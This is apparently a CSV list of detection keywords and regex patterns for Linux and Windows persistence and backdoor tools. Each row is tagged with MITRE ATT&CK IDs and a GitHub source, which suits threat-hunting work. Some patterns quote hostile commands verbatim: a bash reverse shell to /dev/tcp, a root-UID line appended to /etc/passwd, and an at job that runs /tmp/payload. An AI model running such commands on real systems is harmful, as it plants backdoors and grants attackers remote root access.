"*/tmp/auto-shimpwn*",".{0,1000}\/tmp\/auto\-shimpwn.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*/tmp/borg_d3monized*",".{0,1000}\/tmp\/borg_d3monized.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*/tmp/dropbear*",".{0,1000}\/tmp\/dropbear.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#linux","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*/tmp/evil.sh*",".{0,1000}\/tmp\/evil\.sh.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","#linux","N/A","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*/tmp/tmpfolder/pingoor.c*",".{0,1000}\/tmp\/tmpfolder\/pingoor\.c.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*/tmp/tmpfolder/pingoor.h*",".{0,1000}\/tmp\/tmpfolder\/pingoor\.h.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*/tmp/tshd*",".{0,1000}\/tmp\/tshd.{0,1000}","offensive_tool_keyword","tsh","UNIX backdoor","T1103 - T1105 - T1160 - T1189 - T1496 - T1102","TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/creaktive/tsh","1","0","#linux","N/A","10","6","551","127","2024-02-20T18:07:08Z","2011-05-14T19:15:00Z"
"*/tomcat-RH-root.sh*",".{0,1000}\/tomcat\-RH\-root\.sh.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","1","#linux","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*/tsh_linux_amd64*",".{0,1000}\/tsh_linux_amd64.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","#linux","N/A","10","2","157","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z"
"*/tsh_windows_amd64.exe*",".{0,1000}\/tsh_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","N/A","N/A","10","2","157","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z"
"*/tshd.go*",".{0,1000}\/tshd\.go.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#linux","N/A","10","2","157","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z"
"*/tshd_linux_amd64*",".{0,1000}\/tshd_linux_amd64.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","#linux","N/A","10","2","157","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z"
"*/tshd_windows.go*",".{0,1000}\/tshd_windows\.go.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","N/A","N/A","10","2","157","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z"
"*/tshd_windows_amd64.exe*",".{0,1000}\/tshd_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","N/A","N/A","10","2","157","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z"
"*/tsh-go.git*",".{0,1000}\/tsh\-go\.git.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","N/A","N/A","10","2","157","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z"
"*/Use-Waitfor.exe*",".{0,1000}\/Use\-Waitfor\.exe.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","1","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z"
"*/usr/bin/at -M -f /tmp/payload*",".{0,1000}\/usr\/bin\/at\s\-M\s\-f\s\/tmp\/payload.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*/usr/bin/at -M -f /usr/bin/atest*",".{0,1000}\/usr\/bin\/at\s\-M\s\-f\s\/usr\/bin\/atest.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*/usr/bin/bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1*",".{0,1000}\/usr\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/\$ip\/\$port\s0\>\&1.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*/usr/local/bin/escape.sh*",".{0,1000}\/usr\/local\/bin\/escape\.sh.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*/var/tmp/.memory/diamorphine.c*",".{0,1000}\/var\/tmp\/\.memory\/diamorphine\.c.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*/var/tmp/.memory/diamorphine.h*",".{0,1000}\/var\/tmp\/\.memory\/diamorphine\.h.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*/var/www/html/dynasty_rce*",".{0,1000}\/var\/www\/html\/dynasty_rce.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*/Waitfor-Persistence.git*",".{0,1000}\/Waitfor\-Persistence\.git.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","1","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z"
"*/Waitfor-Persistence.ps1*",".{0,1000}\/Waitfor\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","1","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z"
"*/WinPirate.bat*",".{0,1000}\/WinPirate\.bat.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*/WinPirate.git*",".{0,1000}\/WinPirate\.git.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*/WMIPersistence.git*",".{0,1000}\/WMIPersistence\.git.{0,1000}","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","1","N/A","N/A","N/A","2","112","30","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z"
"*/WSAAcceptBackdoor.git*",".{0,1000}\/WSAAcceptBackdoor\.git.{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","1","N/A","N/A","10","2","111","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z"
"*/wso-webshell.git*",".{0,1000}\/wso\-webshell\.git.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","1","N/A","N/A","10","4","360","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*/XRulez binaries.zip*",".{0,1000}\/XRulez\sbinaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*/XRulez.exe*",".{0,1000}\/XRulez\.exe.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*/XRulez.zip*",".{0,1000}\/XRulez\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*-:[GreenwooD]:- WinX Shell*",".{0,1000}\-\:\[GreenwooD\]\:\-\sWinX\sShell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*:\ProgramData\demo.dll*",".{0,1000}\:\\ProgramData\\demo\.dll.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","N/A","7","3","219","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z"
"*:0:0:root:/root:/bin/bash"" >> /etc/passwd*",".{0,1000}\:0\:0\:root\:\/root\:\/bin\/bash\""\s\>\>\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[ + ] Got a packet from the backdoor!*",".{0,1000}\[\s\+\s\]\sGot\sa\spacket\sfrom\sthe\sbackdoor!.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*[ backdoor - Debug ]*",".{0,1000}\[\sbackdoor\s\-\sDebug\s\].{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z"
"*[-] COM Hijacking failed!*",".{0,1000}\[\-\]\sCOM\sHijacking\sfailed!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","#content","N/A","7","3","219","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z"
"*[-] Dropping DLL failed!*",".{0,1000}\[\-\]\sDropping\sDLL\sfailed!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","#content","N/A","7","3","219","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z"
"*[-] Failed to create sudoers backdoor for user *",".{0,1000}\[\-\]\sFailed\sto\screate\ssudoers\sbackdoor\sfor\suser\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[-] Hijacking failed!*",".{0,1000}\[\-\]\sHijacking\sfailed!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","#content","N/A","7","3","219","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z"
"*[+] - Bashrc persistence added!*",".{0,1000}\[\+\]\s\-\sBashrc\spersistence\sadded!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*[+] - Configuring ~/.bashrc for persistence ... *",".{0,1000}\[\+\]\s\-\sConfiguring\s\~\/\.bashrc\sfor\spersistence\s\.\.\.\s.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*[+] - Linux header / Message Of The Day Persistence*",".{0,1000}\[\+\]\s\-\sLinux\sheader\s\/\sMessage\sOf\sThe\sDay\sPersistence.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*[+] - Rootkit Configuration*",".{0,1000}\[\+\]\s\-\sRootkit\sConfiguration.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*[+] - Rootkit configured successfully*",".{0,1000}\[\+\]\s\-\sRootkit\sconfigured\ssuccessfully.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*[+] - Setting up cronjobs for persistence ... *",".{0,1000}\[\+\]\s\-\sSetting\sup\scronjobs\sfor\spersistence\s\.\.\.\s.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*[+] - Systemd Root Level Service successfully configued!*",".{0,1000}\[\+\]\s\-\sSystemd\sRoot\sLevel\sService\ssuccessfully\sconfigued!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*[+] $bin backdoored successful*",".{0,1000}\[\+\]\s\$bin\sbackdoored\ssuccessful.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[+] $binary backdoored successful*",".{0,1000}\[\+\]\s\$binary\sbackdoored\ssuccessful.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[+] /etc/passwd persistence established!*",".{0,1000}\[\+\]\s\/etc\/passwd\spersistence\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[+] Adding your DLL to the LSA Security Packages registry key*",".{0,1000}\[\+\]\sAdding\syour\sDLL\sto\sthe\sLSA\sSecurity\sPackages\sregistry\skey.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","#content","N/A","10","10","1399","244","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
"*[+] APT persistence establis*",".{0,1000}\[\+\]\sAPT\spersistence\sestablis.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[+] At job persistence establish*",".{0,1000}\[\+\]\sAt\sjob\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[+] Authorized_keys persistence establish*",".{0,1000}\[\+\]\sAuthorized_keys\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*[+] Backdoor user persistence establish*",".{0,1000}\[\+\]\sBackdoor\suser\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
